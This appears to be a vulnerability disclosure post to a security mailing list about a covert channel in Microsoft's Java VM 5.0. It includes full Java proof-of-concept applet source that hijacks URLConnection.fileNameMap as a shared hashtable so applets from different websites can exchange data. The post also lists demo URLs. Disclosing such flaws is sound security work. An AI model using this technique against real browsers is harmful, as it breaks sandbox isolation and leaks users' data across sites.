Covert Channel in MSJVM , 5.0 Release 5.0.0.3810
Hi y'all,
I have not found the contact address for microsoft jvm
security issues, therefore maybe someone who reads
bugtraq can forward this:
in the Microsoft (R) VM for Java, 5.0 Release 5.0.0.3810
the implementation of some core system classes allows to
create covert channels between applets that are
loaded from different websites (aka cross-site java).
These applet share a common class loader for
the system classes all public static (non-final)
fields can be used to create a covert channel in accordance
to the sandbox restriction and exchange cross-site
information. This may be used for security zone violation
and general data leakage.
When you load the two applets into two windows of the same IE(if you use Ctrl+N):
A:http://www.tauwerkkunst.de/javatest/SiteA/CovAppletFNMap.html
and
B:http://www.beauchamp.de/tauwerk/javatest/SiteA/CovAppletFNMap.html
you can use the commands
PUT/Key/Value to create an entry in the shared hashtable of the applets
GET/Key to read an entry in the shared hashtable of the applets
'Key' and 'Value' are string values.
So if you PUT/TopScorer/Makaay in the lower textbox and press "Perform
Action" and then switch to applet B which has an identical look and enter
'GET/TopScorer' and "Perform Action" you will be prompted with 'Makaay',
which is an information that should only be known to applet A.
For a demonstration try yourself or look at the first screenshot below [pic1].
I think this is a major violation of sandbox constraints.
Prerequisite is when both applets are started by the same IE process (use Ctrl+N),
as the JVM and its memory are shared. Having two IE processes means two JVMs and of
course no covert channel and you get an error like in the second screenshot [pic2].
Sincerely
Marc Schoenefeld
P.S: Read some more java stuff at www.illegalaccess.org
P.P.S: Thanks to Siva Subbu for the remarks concerning the error messages
pic1, how it should look
pic2, oops, you did not use Ctrl+N
import java.awt.datatransfer.DataFlavor;
import java.net.*;
import java.util.*;
import java.awt.*;
import java.awt.event.*;
public class CovAppletFNMap extends java.applet.Applet {
TextArea ta ;
TextField tf;
Button bu;
Label la1;
Label la2;
class MyButtonListener implements ActionListener {
public void actionPerformed(ActionEvent event) {
String b = URLConnection.fileNameMap.getContentTypeFor(tf.getText());
ta.appendText(tf.getText()+":"+b);
}
}
public CovAppletFNMap () {
la1= new Label("PUT/Key/Value to put in shared Hashtable");
la2= new Label("GET/Key to get from shread Hashtable");
tf = new TextField("", 40);
ta = new TextArea ("",5, 40, TextArea.SCROLLBARS_NONE);
add(ta);
bu = new Button("Perform action");
add(bu);
bu.setBackground(Color.orange);
add(tf);
add(la1);
add(la2);
bu.addActionListener(new MyButtonListener ());
}
public void start() {
if (URLConnection.fileNameMap == null)
URLConnection.fileNameMap = new FNMAP();
URLConnection.fileNameMap.getContentTypeFor("PUT/Bayern/Magath");
String i = URLConnection.fileNameMap.getContentTypeFor("GET/Bayern");
System.out.println(i);
}
public static void main(String[] a) {
new CovAppletFNMap().start();
String i = URLConnection.fileNameMap.getContentTypeFor("GET/Bayern");
}
}
import java.net.*;
import java.util.*;
public class FNMAP implements FileNameMap {
public FNMAP() {
}
Hashtable ht = new Hashtable();
public String getContentTypeFor(String s) {
int i = 0 ;
StringTokenizer t = new StringTokenizer(s,"/");
String action = "";
String key = "";
String value = "";
while (t.hasMoreTokens()) {
String tok = t.nextToken();
// System.out.println(tok);
if (i==0) { action = tok; }
if (i==1) { key = tok; }
if (i==2) { value = tok; }
i++;
}
// System.out.println("action"+action+"key"+key+"value"+value);
if (action.equals("GET")) { return ht.get(key).toString(); }
if (action.equals("PUT")) { ht.put(key,value); return key; }
return "";
}
}